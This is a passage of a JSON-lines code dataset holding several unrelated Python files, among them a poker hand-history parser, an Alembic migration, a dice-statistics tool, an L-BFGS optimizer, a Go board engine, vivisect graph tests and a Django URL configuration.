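# Illustrative usage (editor's sketch; the variable names are hypothetical):\n    #   parser = HandHistoryParser()\n    #   pairs = parser.parseHistoryTexts([history_text], False, False, True)\n    #   # -> [(hand_id, parsed_history), ...]\n\n    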
def parseHandHistory(self, inputFile, outputFile):\n        \n        try:\n            \n            with open(inputFile) as file:\n                history = file.read()\n                analyzer = TxtAnalyzer(history)\n                analyzer.analyze()\n                \n                handprinter = HandPrinter(analyzer,False,False)\n                handprinter.printHandToFile(outputFile) \n                \n                print(\"Parsing successful\")\n            \n        except AnalyzerException as e:\n            print(\"Parsing failed\")\n            print(\"Error: \",e) \n        \n        \nif __name__ == \"__main__\":\n    if(len(sys.argv) < 3):\n        print(\"Invalid arguments -> hhp inputfile outputfile\")\n        sys.exit(1)  # bail out before indexing sys.argv below\n    \n    inputFile = sys.argv[1]\n    outputFile = sys.argv[2]\n    hhp = HandHistoryParser()\n    hhp.parseHandHistory(inputFile, outputFile) \n\n\n\n\n    \n    \n","repo_name":"TheHighFish/openholdembot","sub_path":"RegressionTests/Tools/HandHistoryParser/hhp.py","file_name":"hhp.py","file_ext":"py","file_size_in_byte":1767,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"37"} +{"seq_id":"6668575382","text":"\"\"\"empty message\n\nRevision ID: bd1bcd9ebd07\nRevises: \nCreate Date: 2021-08-14 13:01:44.001166\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'bd1bcd9ebd07'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n    # ### commands auto generated by Alembic - please adjust! ###\n    op.create_table('student',\n    sa.Column('id', sa.Integer(), nullable=False),\n    sa.Column('name', sa.String(length=64), nullable=True),\n    sa.Column('surname', sa.String(length=120), nullable=True),\n    sa.Column('room', sa.Integer(), nullable=True),\n    sa.Column('chat_id', sa.Integer(), nullable=True),\n    sa.Column('date', sa.DateTime(), nullable=True),\n    sa.PrimaryKeyConstraint('id'),\n    sa.UniqueConstraint('chat_id')\n    )\n    op.create_index(op.f('ix_student_name'), 'student', ['name'], unique=False)\n    op.create_index(op.f('ix_student_surname'), 'student', ['surname'], unique=False)\n    op.create_table('problems',\n    sa.Column('id', sa.Integer(), nullable=False),\n    sa.Column('text', sa.String(), nullable=True),\n    sa.Column('student_id', sa.Integer(), nullable=True),\n    sa.ForeignKeyConstraint(['student_id'], ['student.id'], ),\n    sa.PrimaryKeyConstraint('id')\n    )\n    op.create_index(op.f('ix_problems_text'), 'problems', ['text'], unique=False)\n    # ### end Alembic commands ###\n\n\ndef downgrade():\n    # ### commands auto generated by Alembic - please adjust! 
###\n op.drop_index(op.f('ix_problems_text'), table_name='problems')\n op.drop_table('problems')\n op.drop_index(op.f('ix_student_surname'), table_name='student')\n op.drop_index(op.f('ix_student_name'), table_name='student')\n op.drop_table('student')\n # ### end Alembic commands ###\n","repo_name":"t1fan-prog/final-flask","sub_path":"migrations/versions/bd1bcd9ebd07_.py","file_name":"bd1bcd9ebd07_.py","file_ext":"py","file_size_in_byte":1757,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19386464980","text":"import re\nfrom itertools import product\nfrom collections import Counter\nfrom termgraph.termgraph import chart\n\n\n# i.e 1d4+2d4+1+-1\ndef validInput(inp: str) -> bool:\n li = inp.split('+')\n for i in li:\n if bool(re.match(r'^-[0-9]+d[0-9]+$|^[0-9]+d[0-9]+$|^-[0-9]+$|^[0-9]+$',i)) == False:\n return False\n return True\n\ndef modToDice(inp: str) -> list:\n li = inp.split('+')\n dicedmod=[]\n for i in li:\n if bool(re.match(r'^-[0-9]+d[0-9]+$|^[0-9]+d[0-9]+$',i)) == False:\n if i[0] == '-':\n dicedmod.append(f'{i}d1')\n else:\n dicedmod.append(f'{i}d1')\n else:\n dicedmod.append(i)\n return dicedmod\n\n# ['2d4','1d8','8d1']\ndef separateDice(inp: str) -> list:\n dicedmod = modToDice(inp)\n finalDiceList=[]\n for i in dicedmod:\n if i[0] == '-':\n for _ in range(int(i[1:i.index('d')])):\n finalDiceList.append(f'-1{i[i.index(\"d\"):]}')\n else:\n for _ in range(int(i[0:i.index('d')])):\n finalDiceList.append(f'1{i[i.index(\"d\"):]}')\n return finalDiceList\n\ndef stats(inp: str, termgraph_args: dict):\n finalDice = separateDice(inp)\n finalList=[]\n for i in finalDice:\n li=[]\n if i[0] == '-':\n for j in range(int(f'-{i[3:]}'),0):\n li.append(j)\n else:\n for k in range(1,int(i[2:])+1):\n li.append(k)\n finalList.append(li)\n dice_combination = product(*finalList)\n space = list(map(sum,dice_combination))\n space.sort()\n print()\n print(f'min: {space[0]}')\n print(f'max: {space[-1]}')\n print(f'average: {sum(space)/len(space)}')\n print()\n freqs = Counter(space)\n labels = list(map(str,list(freqs.keys())))\n data = []\n for i in list(freqs.values()):\n dataco=[]\n dataco.append(i)\n data.append(dataco)\n\n chart(colors=[],args=termgraph_args,labels=labels,data=data)\n","repo_name":"neel-bp/band_dice_stats","sub_path":"band_dice_stats/funcs.py","file_name":"funcs.py","file_ext":"py","file_size_in_byte":1971,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"12528078799","text":"flames = {\r\n 0: 'Not Compatible',\r\n 1: 'Friends',\r\n 2: 'Lovers',\r\n 3: 'Affection',\r\n 4: 'Marriage',\r\n 5: 'Enemies',\r\n 6: 'Siblings',\r\n}\r\nname = input(\"Enter your name: \").replace(' ','').lower()\r\npartner = input(\"Enter partner's name: \").replace(' ','').lower()\r\na,b = [],[]\r\nnamerem = parrem = ''\r\n\r\nfor x in name:\r\n a.append(x)\r\nfor x in partner:\r\n b.append(x)\r\n\r\nfor x in a:\r\n if x not in b:\r\n namerem += x\r\nfor x in b:\r\n if x not in a:\r\n parrem += x\r\n\r\nsum = len(namerem)+len(parrem)\r\n\r\nprint(f'Your Name\\t\\t\\t\\t\\t\\t\\t: {name}\\n'\r\n f'Partner\\'s\\t\\t\\t\\t\\t\\t\\t: {partner}\\n\\n'\r\n f'Your remaining letters\\t\\t\\t\\t: {\",\".join(namerem)}\\n'\r\n f'Partner\\'s remaining letters\\t\\t\\t: {\",\".join(parrem)}\\n'\r\n f'Your remaining letters(count)\\t\\t: {len(namerem)}\\n'\r\n f'Partner\\'s remaining letters(count)\\t: {len(parrem)}\\n'\r\n f'Sum\\t\\t\\t\\t\\t\\t\\t\\t\\t: {sum}\\n'\r\n 
f'Relationship\\t\\t\\t\\t\\t\\t:{flames[6] if sum%6 == 0 else flames[sum%6] if sum > 6 else flames[sum]}')","repo_name":"ExtraRixe/Prometheus","sub_path":"Python/IT5 Activties/2ndExaminationUsingDictionary.py","file_name":"2ndExaminationUsingDictionary.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38532335537","text":"# -*- coding: utf-8 -*-\nimport functools\nimport numpy as np\nfrom abstract_optimizer import AbstractOptimizer\nfrom util.line_search import *\n\n\nclass LBFGS(AbstractOptimizer):\n def __init__(self, correction=10, max_iter=100, is_plot_loss=True, epoches_record_loss=10):\n super(LBFGS, self).__init__()\n self._correction = correction\n self._max_iter = max_iter\n self._is_plot_loss = is_plot_loss\n self._epoches_record_loss = epoches_record_loss\n self._tol = 1e-9\n\n def optim(self, feval, X, y, parameter):\n f = functools.partial(feval, X=X, y=y)\n loss, gk = f(parameter)\n dk = -gk\n directions = np.zeros((len(gk), 0))\n steps = np.zeros((len(gk), 0))\n gktd = np.dot(gk.T, dk)\n alpha = min(1, 1 / np.sum(np.abs(gk)))\n alpha, loss, gk_plus, parameter = wolfe(f, parameter, dk, alpha, sigma=0.9, max_iter=10)\n for epoch in xrange(self._max_iter):\n loss_old = loss\n dk, directions, steps = self._lbfgs_update(gk, gk_plus, dk, alpha, directions, steps)\n gk, gktd_plus = gk_plus, np.dot(gk_plus.T, dk)\n if gktd_plus > - self._tol:\n self._logger.info('directional derivative below tol.')\n break\n alpha = alpha * min(2, gktd / gktd_plus)\n gktd = gktd_plus\n alpha, loss, gk_plus, parameter = wolfe(f, parameter, dk, alpha)\n if np.sum(np.abs(alpha * dk)) <= self._tol:\n self._logger.info('step size below tol.')\n break\n if np.abs(loss - loss_old) < self._tol:\n self._logger.info('loss changing by less than tol.')\n break\n if epoch % self._epoches_record_loss == 0 or epoch == self._max_iter - 1 and loss is not None:\n self.losses.append(loss)\n self._logger.info('Epoch %d\\tloss: %f' % (epoch, loss))\n if self._is_plot_loss is True:\n self.plot()\n return parameter\n\n def _lbfgs_update(self, gk, gk_plus, dk, alpha, directions, steps):\n y = gk_plus - gk\n s = alpha * dk\n directions, steps, Hk = self._limit_memory(y, s, directions, steps)\n dk_plus = self._bfgs_update(Hk, directions, steps, -gk_plus)\n return dk_plus, directions, steps\n\n def _limit_memory(self, y, s, direction, step):\n yts = np.dot(y.T, s)\n nCorr = direction.shape[1]\n if nCorr < self._correction:\n direction = np.hstack([direction, s.reshape(-1, 1)])\n step = np.hstack([step, y.reshape(-1, 1)])\n else:\n direction = np.hstack([direction[:, 1:], s.reshape(-1, 1)])\n step = np.hstack([step[:, 1:], y.reshape(-1, 1)])\n Hk = yts / np.dot(y.T, y)\n return direction, step, Hk\n\n def _bfgs_update(self, Hk, s, y, d):\n r = d\n k = s.shape[1]\n rho = np.zeros(k)\n for i in xrange(k):\n rho[i] = 1. 
/ np.dot(y[:, i].T, s[:, i])\n        alpha = np.zeros((k, 1))\n        for i in xrange(k - 1, -1, -1):\n            alpha[i] = rho[i] * np.dot(s[:, i].T, r)\n            r = r - alpha[i] * y[:, i]\n        r *= Hk\n        for i in xrange(k):\n            beta = rho[i] * np.dot(y[:, i].T, r)\n            r = r + (alpha[i] - beta) * s[:, i]\n        return r\n","repo_name":"wyslatitude/FunnyPyML","sub_path":"optimizer/lbfgs.py","file_name":"lbfgs.py","file_ext":"py","file_size_in_byte":3321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9414347146","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Date    : 2016-09-06 16:51:18\n# @Author  : Your Name (you@example.org)\n# @Link    : http://example.org\n# @Version : $Id$\n\nimport os\nimport MySQLdb\nimport time\nimport re\nimport db_mysql\nfrom decimal import *\nimport math\n\n\nclass Financial(object):\n    def __init__(self, cu_no, create_time):\n        self.cu_no = cu_no\n        self.create_time = create_time\n        self.db_object = db_mysql.db_object()\n        self.conn = self.db_object[0]\n        self.cur = self.db_object[1]\n\n    def express_resolve(self, name):\n        \"\"\"\n        Resolve the express formula for the given name\n        \"\"\"\n        self.query = 'SELECT express FROM cr_report_item_config WHERE name LIKE \"%{name}%\"'.format(name=name)\n        self.express = db_mysql.db_select_on(self.query)  # the formula\n        print(self.express[0])  # print the formula\n\n        self.exprs = re.findall(r'[a-zA-Z]{2}\\d{1}', self.express[0])  # indicator-table codes in the formula\n        self.exprs1 = re.findall(r\"\\'\\d{3,4}\\'\", self.express[0])  # indicator line items\n        print(self.exprs)\n        print(self.exprs1)\n        li = []\n        for j, i in enumerate(self.exprs):\n            self.tab, self.years = self.ret_table(i)  # resolve table name and year\n            print(self.tab, self.years)\n            self.index_terms = self.exprs1[j][1:-1]  # line_num of the indicator item\n            print(self.index_terms)\n            # query the database; SUBSTRING(report_date,1,4) extracts the year from the date\n            # SELECT * FROM `cr_core_income_statement` WHERE SUBSTRING(report_date,1,4) = '2016'\n            self.query1 = 'SELECT item_sum FROM {table} WHERE cu_no=\"{cu_no}\" AND\\\n             line_num=\"{line_num}\" AND SUBSTRING(report_date,1,4)=\"{date}\" and SUBSTRING(createTime,1,10)=\"{create_time}\"'.format( \\\n                table=self.tab, cu_no=self.cu_no, line_num=self.index_terms, date=self.years,\n                create_time=self.create_time)\n            # print self.query1\n            self.resu = db_mysql.db_select_on(self.query1)  # fetch the item_sum value; returns a tuple\n            li.append(self.resu)\n\n        print(li)\n        s = re.sub(r\"\\w+\\[\\'\\d+\\'\\]\", '?', self.express[0])\n        exp = self.replace_exp(s, li).lower()\n        print(exp, eval(exp))\n\n    def replace_exp(self, s, li):\n        \"\"\"\n        Replace the indicator placeholders in the formula with the values queried from the database\n        \"\"\"\n        self.m = ''\n        for i in li:\n            if self.m == '':\n                self.s = s.replace('?', str(i[0]), 1)\n                self.m = self.s\n            else:\n                self.m = self.m.replace('?', str(i[0]), 1)\n        return self.m\n\n    def ret_table(self, expr):\n        \"\"\"\n        Map an indicator-table code from the formula to its database table and year\n        \"\"\"\n        self.ta = expr[:2]\n        self.years = expr[2:]\n        if self.ta == 'zf':\n            self.ta1 = 'cr_core_balance_sheet'  # balance sheet\n        elif self.ta == 'xl':\n            self.ta1 = 'cr_core_cashflow_statement'  # cash flow statement\n        else:\n            self.ta1 = 'cr_core_income_statement'  # income statement\n\n        if self.years == '1':\n            self.years1 = '2016'\n        elif self.years == '2':\n            self.years1 = '2015'\n        else:\n            self.years1 = '2014'\n        return self.ta1, self.years1\n\n\nif __name__ == '__main__':\n    name = '净利润增长率(单位:%)'\n    create_time = '2016-09-08'\n    fin = Financial('1420a551-b76c-4ef1-902d-49226777e0ec', create_time)\n    fin.express_resolve(name)\n    # exec('print 1+3+4')\n\n\n    # eval: evaluates an expression held in a string\n    # exec: executes statements held in a string\n    # execfile: executes a file\n","repo_name":"xycfree/python_linux","sub_path":"other/financial.py","file_name":"financial.py","file_ext":"py","file_size_in_byte":3647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70535422189","text":"from __future__ import annotations\nimport copy\nfrom dlgo.gotypes import Player, Point\nfrom dlgo.scoring import compute_game_result\nfrom dlgo import zobrist\nfrom dlgo.utils.utils import MoveAge\nfrom typing import Tuple, Dict, List, Iterable, Optional, FrozenSet, cast\n\nfrom dlgo.utils.profiling import timing\n\n__all__ = [\n    'Board',\n    'GameState',\n    'Move',\n    'GoString'\n]\n\nneighbor_tables = {}\ncorner_tables = {}\n\n\ndef init_neighbor_table(dim: Tuple[int, int]):\n    rows, cols = dim\n    new_table: Dict[Point, List[Point]] = {}\n    for r in range(1, rows + 1):\n        for c in range(1, cols + 1):\n            p = Point(row=r, col=c)\n            full_neighbors = [\n                Point(p.row - 1, p.col),\n                Point(p.row + 1, p.col),\n                Point(p.row, p.col - 1),\n                Point(p.row, p.col + 1),\n            ]\n            true_neighbors = [\n                n for n in full_neighbors\n                if 1 <= n.row <= rows and 1 <= n.col <= cols]\n            new_table[p] = true_neighbors\n    neighbor_tables[dim] = new_table\n\n\ndef init_corner_table(dim: Tuple[int, int]):\n    rows, cols = dim\n    new_table: Dict[Point, List[Point]] = {}\n    for r in range(1, rows + 1):\n        for c in range(1, cols + 1):\n            p = Point(row=r, col=c)\n            full_corners = [\n                Point(p.row - 1, p.col - 1),\n                Point(p.row - 1, p.col + 1),\n                Point(p.row + 1, p.col - 1),\n                Point(p.row + 1, p.col + 1),\n            ]\n            true_corners = [\n                n for n in full_corners\n                if 1 <= n.row <= rows and 1 <= n.col <= cols]\n            new_table[p] = true_corners\n    corner_tables[dim] = new_table\n\n\nclass IllegalMoveError(Exception):\n    pass\n\n\nclass GoString:\n    \"\"\"\n    Immutable !\n    Keeps track of a group of connected stones and their liberties\n    \"\"\"\n\n    def __init__(self, color: Player, stones: Iterable[Point], liberties: Iterable[Point]):\n        self.color = color\n        self.stones = frozenset(stones)\n        self.liberties = frozenset(liberties)\n\n    def without_liberty(self, point) -> GoString:\n        new_liberties = self.liberties - {point}\n        return GoString(self.color, self.stones, new_liberties)\n\n    def with_liberty(self, point) -> GoString:\n        new_liberties = self.liberties | {point}\n        return GoString(self.color, self.stones, new_liberties)\n\n    def merged_with(self, go_string: GoString) -> GoString:\n        assert go_string.color == self.color\n        combined_stones = self.stones | go_string.stones\n        combined_liberties = (self.liberties | go_string.liberties) - combined_stones\n        return GoString(self.color, combined_stones, combined_liberties)\n\n    @property\n    def num_liberties(self) -> int:\n        return len(self.liberties)\n\n\nclass Board:\n    def __init__(self, num_rows: int, num_cols: int):\n        self.num_rows = num_rows\n        self.num_cols = num_cols\n        self._grid: Dict[Point, Optional[GoString]] = {}\n        self._hash = zobrist.EMPTY_BOARD\n\n        dim = (num_rows, num_cols)\n        if dim not in neighbor_tables:\n            init_neighbor_table(dim)\n        if dim not in corner_tables:\n            init_corner_table(dim)\n        self.neighbor_table = neighbor_tables[dim]\n        self.corner_table = corner_tables[dim]\n        self.move_ages = MoveAge(self)\n\n    def neighbors(self, point) -> List[Point]:\n        return self.neighbor_table[point]\n\n    def corners(self, point) -> List[Point]:\n        return self.corner_table[point]\n\n    def place_stone(self, player: Player, point: Point):\n        assert self.is_on_grid(point)\n        if self._grid.get(point) is not None:\n            print('Illegal play on %s' % str(point))\n            
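# the target point is already occupied, so reject the move instead of overwriting the existing stone\n            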
raise IllegalMoveError()\n assert self._grid.get(point) is None\n adjacent_same_color: List[GoString] = []\n adjacent_opposite_color: List[GoString] = []\n liberties: List[Point] = []\n self.move_ages.increment_all()\n self.move_ages.add(point)\n for neighbor in self.neighbor_table[point]:\n neighbor_string = self._grid.get(neighbor)\n if neighbor_string is None:\n liberties.append(neighbor)\n elif neighbor_string.color == player:\n if neighbor_string not in adjacent_same_color:\n adjacent_same_color.append(neighbor_string)\n else:\n if neighbor_string not in adjacent_opposite_color:\n adjacent_opposite_color.append(neighbor_string)\n\n new_string = GoString(player, [point], liberties)\n\n for same_color_string in adjacent_same_color:\n new_string = new_string.merged_with(same_color_string)\n for new_string_point in new_string.stones:\n self._grid[new_string_point] = new_string\n\n self._hash ^= zobrist.HASH_CODE[point, player]\n\n for other_color_string in adjacent_opposite_color:\n replacement = other_color_string.without_liberty(point)\n if replacement.num_liberties:\n self._replace_string(replacement)\n else:\n self._remove_string(other_color_string)\n\n def _replace_string(self, new_string: GoString):\n for point in new_string.stones:\n self._grid[point] = new_string\n\n def _remove_string(self, string: GoString):\n for point in string.stones:\n self.move_ages.reset_age(point)\n # Removing a string can create liberties for other strings.\n for neighbor in self.neighbor_table[point]:\n neighbor_string = self._grid.get(neighbor)\n if neighbor_string is None:\n continue\n if neighbor_string is not string:\n self._replace_string(neighbor_string.with_liberty(point))\n self._grid[point] = None\n self._hash ^= zobrist.HASH_CODE[point, string.color]\n\n def is_self_capture(self, player: Player, point: Point) -> bool:\n friendly_strings = []\n for neighbor in self.neighbors(point):\n neighbor_string = self._grid.get(neighbor)\n if neighbor_string is None:\n # This point has a liberty. 
Can't be self capture.\n return False\n elif neighbor_string.color == player:\n # Gather for later analysis.\n friendly_strings.append(neighbor_string)\n else:\n if neighbor_string.num_liberties == 1:\n # This move is real capture, not a self capture.\n return False\n if all(neighbor.num_liberties == 1 for neighbor in friendly_strings):\n return True\n return False\n\n def will_capture(self, player: Player, point: Point) -> bool:\n for neighbor in self.neighbor_table[point]:\n neighbor_string = self._grid.get(neighbor)\n if neighbor_string is None:\n continue\n elif neighbor_string.color == player:\n continue\n else:\n if neighbor_string.num_liberties == 1:\n # This move would capture.\n return True\n return False\n\n def is_on_grid(self, point: Point) -> bool:\n return 1 <= point.row <= self.num_rows and 1 <= point.col <= self.num_cols\n\n def get(self, point: Point) -> Optional[Player]:\n string = self._grid.get(point)\n if string is None:\n return None\n return string.color\n\n def get_go_string(self, point: Point) -> Optional[GoString]:\n return self._grid.get(point)\n\n def __eq__(self, other):\n return isinstance(other, Board) and \\\n self.num_rows == other.num_rows and \\\n self.num_cols == other.num_cols and \\\n self._hash == other._hash\n\n def __deepcopy__(self, memodict=None):\n copied = Board(self.num_rows, self.num_cols)\n # Can do a shallow copy b/c the dictionary maps tuples\n # (immutable) to GoStrings (also immutable)\n copied._grid = self._grid.copy()\n copied._hash = self._hash\n return copied\n\n def zobrist_hash(self) -> int:\n return self._hash\n\n\nclass Move:\n def __init__(self, point: Point = None, is_pass: bool = False, is_resign: bool = False):\n \"\"\"\n Never call this constructor directly. Use @classmethod factories from this class.\n \"\"\"\n self.point = point\n self.is_play = (self.point is not None)\n self.is_pass = is_pass\n self.is_resign = is_resign\n assert self.is_play + self.is_pass + self.is_resign == 1\n\n @classmethod\n def play(cls, point: Point) -> Move:\n \"\"\"A move that places a stone on the board.\"\"\"\n return Move(point=point)\n\n @classmethod\n def pass_turn(cls) -> Move:\n return Move(is_pass=True)\n\n @classmethod\n def resign(cls) -> Move:\n return Move(is_resign=True)\n\n def __str__(self):\n if self.is_pass:\n return 'pass'\n if self.is_resign:\n return 'resign'\n return '(r %d, c %d)' % (self.point.row, self.point.col)\n\n def __hash__(self):\n return hash((self.is_play, self.is_pass, self.is_resign, self.point))\n\n def __eq__(self, other):\n return (self.is_play, self.is_pass, self.is_resign, self.point) == \\\n (other.is_play, other.is_pass, other.is_resign, other.point)\n\n\nclass GameState:\n def __init__(self, board: Board, next_player: Player, previous_state: Optional[GameState],\n last_move: Optional[Move]):\n self.board = board\n self.next_player = next_player\n self.previous_state = previous_state\n self.last_move = last_move\n if previous_state is None:\n self.previous_states: FrozenSet[Tuple[Player, int]] = frozenset()\n else:\n self.previous_states = frozenset(\n previous_state.previous_states | {(previous_state.next_player, previous_state.board.zobrist_hash())})\n\n def apply_move(self, move: Move) -> GameState:\n \"\"\"Return the new GameState after applying the move.\"\"\"\n if move.is_play:\n point = cast(Point, move.point)\n next_board = copy.deepcopy(self.board)\n next_board.place_stone(self.next_player, point)\n else:\n next_board = self.board\n return GameState(next_board, self.next_player.opposite, self, 
move)\n\n    @classmethod\n    def new_game(cls, board_size: int) -> GameState:\n        board = Board(board_size, board_size)\n        return GameState(board, Player.black, None, None)\n\n    def is_move_self_capture(self, player, move):\n        if not move.is_play:\n            return False\n        return self.board.is_self_capture(player, move.point)\n\n    @property\n    def situation(self) -> Tuple[Player, Board]:\n        return self.next_player, self.board\n\n    def does_move_violate_ko(self, player: Player, move: Move) -> bool:\n        if not move.is_play:\n            return False\n        point = cast(Point, move.point)\n        if not self.board.will_capture(player, point):\n            return False\n        next_board = copy.deepcopy(self.board)\n        next_board.place_stone(player, point)\n        next_situation = (player.opposite, next_board.zobrist_hash())\n        return next_situation in self.previous_states\n\n    def is_valid_move(self, move: Move) -> bool:\n        if self.is_over():\n            return False\n        if move.is_pass or move.is_resign:\n            return True\n        return (\n            self.board.get(cast(Point, move.point)) is None and\n            not self.is_move_self_capture(self.next_player, move) and\n            not self.does_move_violate_ko(self.next_player, move))\n\n    def is_over(self) -> bool:\n        if self.last_move is None:\n            return False\n        if self.last_move.is_resign:\n            return True\n        previous_state = cast(GameState, self.previous_state)\n        second_last_move = previous_state.last_move\n        if second_last_move is None:\n            return False\n        return self.last_move.is_pass and second_last_move.is_pass\n\n    def legal_moves(self) -> List[Move]:\n        if self.is_over():\n            return []\n        moves = []\n        for row in range(1, self.board.num_rows + 1):\n            for col in range(1, self.board.num_cols + 1):\n                move = Move.play(Point(row, col))\n                if self.is_valid_move(move):\n                    moves.append(move)\n        # These two moves are always legal.\n        moves.append(Move.pass_turn())\n        moves.append(Move.resign())\n\n        return moves\n\n    def winner(self) -> Optional[Player]:\n        if not self.is_over():\n            return None\n        if self.last_move and self.last_move.is_resign:\n            return self.next_player\n        game_result = compute_game_result(self)\n        return game_result.winner\n","repo_name":"vadozy/go-bot","sub_path":"src/dlgo/goboard.py","file_name":"goboard.py","file_ext":"py","file_size_in_byte":12939,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"71020541226","text":"'''\nwhile\nWe use it to perform actions while a condition is true.\n* Prerequisites: understanding conditions and operations\n'''\n'''while True:  # infinite loop\n    nome = input('Name: ')\n    print(f'Hello {nome}') '''\n\nx = 0\ny = 0\n'''while x <= 10:\n    print(x)\n    x = x + 1\nprint('END')'''\n\n'''while x < 10:\n    if x == 3:  # if x equals 3, the rest of the loop body is not executed\n        x = x + 1\n        continue  # everything after continue is skipped for this iteration\n    print(x)\n    x = x + 1\nprint('END')'''\n\n'''while x < 10:\n    if x == 3:\n        x = x + 1\n        break  # ends the loop\n    print(x)\n    x = x + 1'''\n\n'''__________________________________________________________________'''\n'''while x < 10:\n    y = 0\n    while y < 5:\n        print(f'X is {x} and Y is {y}')\n        y += 1\n    x += 1  # x = x + 1\nprint('END')'''\n\n'''---------------------------------------------------------------------------'''\n\nwhile True:\n    num_1 = input('Enter a number: ')\n    num_2 = input('Enter another number: ')\n    operador = input('Enter an operator: ')\n    sair = input('do you want to quit? [y]es or [n]o ')\n\n    if not num_1.isnumeric() or not num_2.isnumeric():\n        print('You need to enter a number')\n        continue\n\n    num_1 = int(num_1)\n    num_2 = int(num_2)\n\n    # + - / *\n    if operador == '+':\n        print(num_1 + num_2)\n    elif operador == '-':\n        print(num_1 - num_2)\n    elif operador == '/':\n        print(num_1 / num_2)\n    elif operador == '*':\n        print(num_1 * num_2)\n    else:\n        print('Invalid operator.')\n    if sair == 'y':  # the check matches the translated [y]es/[n]o prompt above\n        break\n","repo_name":"LFWinther/CursoPython","sub_path":"Aulas1/aula34.py","file_name":"aula34.py","file_ext":"py","file_size_in_byte":1628,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3267508914","text":"import os\nimport unittest\nimport vivisect\nimport vivisect.tests.vivbins as vivbins\nimport vivisect.tools.graphutil as viv_graph\n\nclass VivGraphTest(unittest.TestCase):\n\n    def getTestWorkspace(self, fname, analyze=True):\n        fpath = os.path.join('vivisect','bins',fname)\n        vw = vivisect.VivWorkspace()\n        vw.loadFromFile(fpath)\n        if analyze:\n            vw.analyze()\n        return vw\n\n    def getAnsWorkspace(self, fname):\n        fpath = os.path.join('vivisect','bins','%s.viv' % fname)\n        vw = vivisect.VivWorkspace()\n        vw.loadWorkspace(fpath)\n        return vw\n\n    def checkGetCodePaths(self, vw, fva):\n        graph = viv_graph.buildFunctionGraph(vw, fva )\n        paths = [ path for path in viv_graph.getCodePaths(graph) ]\n        self.codepaths = paths\n        self.assertGreater(len(self.codepaths), 150)\n\n    def checkGetCodePathsThru(self, vw, fva, cbva):\n        graph = viv_graph.buildFunctionGraph(vw, fva )\n        paths = [ path for path in viv_graph.getCodePathsThru(graph, cbva) ]\n        self.codepathsthru = paths\n        self.assertGreater(len(self.codepaths), len(self.codepathsthru))\n\n        paths = [ path for path in graph.getHierPathsThru((cbva,)) ]\n        self.hiercodepathsthru = paths\n        self.assertGreater(len(self.codepaths), len(self.hiercodepathsthru))\n\n    def checkGetCodePathsFrom(self, vw, fva, cbva):\n        graph = viv_graph.buildFunctionGraph(vw, fva )\n        paths = [ path for path in viv_graph.getCodePathsFrom(graph, cbva) ]\n        self.codepathsfrom = paths\n        self.assertGreater(len(self.codepaths), 150)\n\n        paths = [ path for path in graph.getHierPathsFrom((cbva,)) ]  # call the method, mirroring getHierPathsThru/To above\n        self.hierpathsfrom = paths\n        self.assertGreater(len(self.codepaths), len(self.hierpathsfrom))\n\n    def checkGetCodePathsTo(self, vw, fva, cbva):\n        graph = viv_graph.buildFunctionGraph(vw, fva )\n        paths = [ path for path in viv_graph.getCodePathsTo(graph, cbva) ]\n        self.codepathsto = paths\n        self.assertGreater(len(self.codepaths), len(self.codepathsto))\n\n        paths = [ path for path in graph.getHierPathsTo((cbva,)) ]\n        self.hierpathsto = paths\n        self.assertGreater(len(self.codepaths), len(self.hierpathsto))\n\n    def checkGetLoopPaths(self, vw, fva):\n        graph = viv_graph.buildFunctionGraph(vw, fva )\n        paths = [ path for path in viv_graph.getLoopPaths(graph) ]\n        self.looppaths = paths\n        self.assertGreater(len(self.codepaths), 150)\n\n    def checkGetLongPath(self, vw, fva):\n        graph = viv_graph.buildFunctionGraph(vw, fva)\n        paths = [ path for path in viv_graph.getLongPath(graph) ]\n        self.codepaths = paths\n        self.assertGreater(len(self.codepaths), 150)\n\n    def checkPathGenGetCodePaths(self, vw, fva):\n        graph = viv_graph.buildFunctionGraph(vw, fva)\n        paths = [ path for path in viv_graph.getCodePathsThru(graph) ]\n        self.codepaths = paths\n        self.assertGreater(len(self.codepaths), 150)\n\n    def checkCoveragePaths(self, vw, fva):\n        graph = viv_graph.buildFunctionGraph(vw, fva)\n        paths = [ path for path in 
viv_graph.getCoveragePaths(graph, 150) ]\n        self.codepaths = paths\n        self.assertEqual(len(self.codepaths), 22)\n\n    @vivbins.require\n    def test_viv_graph_paths(self):\n        # one file\n        fname = 'testexe_amd64.exe'\n        fva = 0x1400060ac\n        cbva = 0x1400061bf\n        vw = self.getAnsWorkspace(fname)\n\n        self.checkGetCodePaths(vw, fva)\n        self.checkGetCodePathsThru(vw, fva, cbva)\n        self.checkGetCodePathsFrom(vw, fva, cbva)\n        self.checkGetCodePathsTo(vw, fva, cbva)\n        self.checkGetLoopPaths(vw, fva)\n        self.checkGetLongPath(vw, fva)\n        self.checkCoveragePaths(vw, fva)\n\n","repo_name":"bat-serjo/vivisect-py3","sub_path":"vivisect/tests/testvivgraph.py","file_name":"testvivgraph.py","file_ext":"py","file_size_in_byte":3763,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"37"}{"seq_id":"15233174923","text":"from django.urls import path\nfrom App_Login import views\n\napp_name = 'App_Login'\n\nurlpatterns = [\n    path('signup/', views.sign_up, name='signup'),\n    path('login/', views.log_in, name='login'),\n    path('logout/', views.logout_page, name='logout'),\n    path('edit_profile/', views.edit_profile, name='edit_profile'),\n    path('profile/', views.profile, name='profile'),\n    path('user/<str:username>/', views.searching_user, name='searching_user'),\n    path('follow/', views.follow, name='follow'),\n  